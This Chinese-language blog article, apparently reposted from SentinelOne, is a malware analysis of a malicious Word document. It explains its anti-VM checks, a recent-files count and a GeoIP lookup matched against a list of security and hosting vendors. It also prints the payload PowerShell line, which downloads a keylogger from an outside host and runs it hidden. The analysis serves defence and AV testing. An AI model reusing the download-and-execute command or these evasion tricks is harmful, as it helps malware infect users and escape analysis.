愛學 | 如何躲避虛擬機檢測？

最近，我在調查一個惡意軟體，並且花了很多時間在這上面，結果發現這款惡意軟體很不尋常，一丁點問題就可能導致它崩潰，根本起不了破壞作用。

在這篇文章中，我會探討在一個惡意Word文檔中發現的一些躲避虛擬機檢測的伎倆。

這個惡意軟體的名字叫做"Intelligent Software Solutions Inc.doc」，sha256哈希是048fc07fb94a74990d2d2b8e92c099f3f986af185c32d74c857b07f7fcce7f8e。相關的軟體樣本可以在VirusTotal搜索"vbaproject.bin""activeX1.bin" type:docx找到。

這便是這個文檔在Word中打開的樣子：

看起來沒什麼可疑的。再來看下代碼：

這是一個典型的Word惡意軟體。它沒有實質內容，包括可執行的代碼（活動內容），代碼看上去一片混亂。

我首先注意到上面的這個子程序：InkPicture1_Painted(ByValDQkDFU As Long, ByVal KPhPosT As IInkRectangle)。它看起來像是一個入口點，很有可能每次點擊」Enable Content"鍵或ActiveX control被Word渲染時代碼就被執行。它會調用IuIxpP然後把引起的一切錯誤都給「吞掉」。

伎倆 #1

這個IuIxpP 子程序會調用兩個方法：DKTxHE和qrNjY，如果其中一個返回true,就會引發一個錯誤。第一個DKTxHE看上去很簡單：

Public Function DKTxHE() As BooleanDKTxHE = RecentFiles.Count < 3End Function

通過RecentFiles對象可以訪問歷史文檔。除非是剛安裝的Word，許多用戶都打開過兩個以上的文檔。不過在虛擬機測試中，軟體通常顯示未被「侵入」。當創建了一個虛擬機，安裝好軟體（或者還打開過一兩次測試其是否能用），這個狀態就被保存下來，每次需要測試的時候，重新載入一下即可。

這些虛擬機鏡像可被用於自動分析和測試工具中，這些工具運行惡意軟體以查看它們是如何工作。如果一個惡意軟體足夠聰明知道自己在虛擬機中被測試的話，它就會避免做出一些可疑行為，從而延長被這些測試工具發現的時間。

伎倆 #2

第二個子程序qrNjY，則試圖通過獲取IP地址來查看是否是虛擬機，它向https://www.maxmind.com/geoip/v2.1/city/me 發送了一個請求，這通常會要求某種身份認證或API密鑰。為了避開這個要求，惡意軟體會通過將HTTP Referrer 設置為https://www.maxmind.com/en/locate-my-ip-address，User-Agent 設置為Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)來使這個請求看起來像是站點自身發出來的。不過通過這種手段只能獲取所請求地址的信息，用途有限。

得到的回復是JSON格式的，包含了諸如國家、城市等信息，其中最重要的是跟這個IP地址相聯繫的機構信息。例如：

{"location": { "latitude":30.7858, "longitude":-102.1232, "metro_code": 705, "accuracy_radius": 5, "time_zone":"America/Los_Angeles" }, "continent": { "names": { "ja": "北アメリカ", "pt-BR":"América do Norte", "de": "Nordamerika", "es":"Norteamérica", "ru": "Северная Америка", "fr": "Amérique du Nord", "zh-CN": "北美洲", "en": "North America" }, "code":"NA", "geoname_id":6255149 }, "city": { "names": { "pt-BR":"Oakland", "de":"Oakland", "es":"Oakland", "ja": "オークランド", "en":"Oakland", "ru": "Окленд", "fr":"Oakland", "zh-CN": "奧克蘭" }, "geoname_id":5378538 }, "postal": { "code":"94619" }, "country": { "names": { "ru": "США", "fr": "états-Unis", "zh-CN": "美國", "en": "United States", "ja": "アメリカ合衆國", "es": "EstadosUnidos", "pt-BR": "EstadosUnidos", "de": "USA" }, "iso_code": "US", "geoname_id":6252001 }, "traits": { "organization": "Comcast Cable", "isp": "Comcast Cable", "ip_address": "123.123.123.123", "autonomous_system_organization": "Comcast CableCommunications, LLC", "domain":"comcast.net", "autonomous_system_number": 7922 }, "registered_country": { "geoname_id":6252001, "names": { "zh-CN": "美國", "ru": "США", "fr": "états-Unis", "en": "United States", "ja": "アメリカ合衆國", "pt-BR": "EstadosUnidos", "de": "USA", "es": "EstadosUnidos" }, "iso_code": "US" }, "subdivisions": [ { "geoname_id":5332921, "names": { "ru": "Калифорния", "fr":"Californie", "zh-CN": "加利福尼亞州", "en":"California", "ja": "カリフォルニア州", "pt-BR": "Califórnia", "es":"California", "de": "Kalifornien" }, "iso_code": "CA" } ]}

從上面的示例回復中，可以得知這個IP地址跟Comcast關聯。同時，在請求發出後，一些字元串被解碼並存儲在陣列中，如果返回的JSON中含有任何這些字元串，代碼就會報告錯誤並停止執行。在比對之前所有內容都被轉為大寫字母。字元串被轉寫位大寫，在陣列中按字母順序排列：

AmazonanonymousBitDefenderBlackOakComputersBlue CoatBlueCoatCiscocloudData CenterDataCenterDataCentrededicatedESET, SpolFireEyeForcePointFortinetHetznerhispeed.chhostedHostingIron PortIronPortLeaseWebMessageLabsMicrosoftMimeCastNForceOvh SasPalo AltoProofPointRackspacesecurityServerStrong TechnologiesTrend MicroTrendMicroTrustWaveVMVaultZscaler

在創建了這個列表之後，很明顯，這個子程序的目的是檢查這些IP地址是否跟一些託管和反病毒公司關聯，那些公司經常會使用虛擬機來測試惡意軟體。

在把這兩個反沙盒和反虛擬機的子程序拆開分析後，我大概知道為什麼有時我們檢測不到這個惡意插件了。為了驗證我的猜想，我創建了一個新Word文檔，複製兩份，然後給三個文檔分別命名了不同的名字。然後，我打開了其中一個並關閉，以製造出歷史文檔記錄。接著，我打開惡意軟體，啟動活動內容，果不其然立馬就彈出「檢測到威脅」，惡意文檔差不多是立刻終止，根本就沒機會搞「破壞」。因為它實際上也沒做什麼破壞，所以也檢測不到。

由於仍然好奇其有效載荷（payload），我繼續拆解該軟體，然後發現它能執行一些PowerShell命令：

powershell.exe -ExecutionPolicy Bypass-WindowStyle Hidden -command $f=[System.IO.Path]::GetTempFileName();(New-ObjectSystem.Net.WebClient).DownloadFile(http://silkflowersdecordesign.com/admin/worddata.dat,$f);(New-Object -com WScript.Shell).Exec($f)

這個腳本下載了http://silkflowersdecordesign.com/admin/worddata.dat，這是一個低級別的擊鍵記錄器，其中worddata.dat 的 sha256 哈希是19d884d3b688abf8e284d3bc6a06817096d15592bcd73f85a0e4b79749f2a744.

研究人員在Proofpoint，Deepen Desai在zscaler上都曾探討了躲避虛擬機／躲避沙盒技術。這些方法在不同惡意軟體家族中都出現過，看起來這似乎是基於VBA的惡意軟體的新發展趨勢。

測試惡意軟體不容易，很多地方都會出錯，特別是當你不是僅僅基於signatures而是檢測惡意行為時，為了能正確評估一個AV產品，必須像這樣測試——運行這些惡意代碼，觀察其最真實的行為。不過你得挑那些還「活著」的，也就是說其命令和控制的伺服器還存在而且運行良好，此外你還要將虛擬機設置得儘可能地貼近真實用戶的情況。

這兩點都可以實現。但測試經常會遇到：惡意軟體不能有效執行或者沒有作出惡意行為；新創建的虛擬機鏡像根本沒有用戶活動記錄；或是在雲端運行測試，而這又很容易通過詢問IP地址信息被惡意軟體覺察。挑選合適的測試對象並創建合適的虛擬鏡像需要下一些工夫。

如果在這上邊偷懶，測試結果就會偏離，而且也沒有意義。Signatures可以很輕鬆地檢測到不能運行或者沒有惡意行為的可執行文檔，但問題是，這些是你的用戶面臨的威脅嗎？真正的威脅是那些沒人見過的，或者非常新以至於signatures還沒被製造出來。一次好的測試必須使用目前仍然運行良好的惡意軟體樣本，並在最逼真的環境中執行。

註：本文參考來源於sentinelone

推薦閱讀：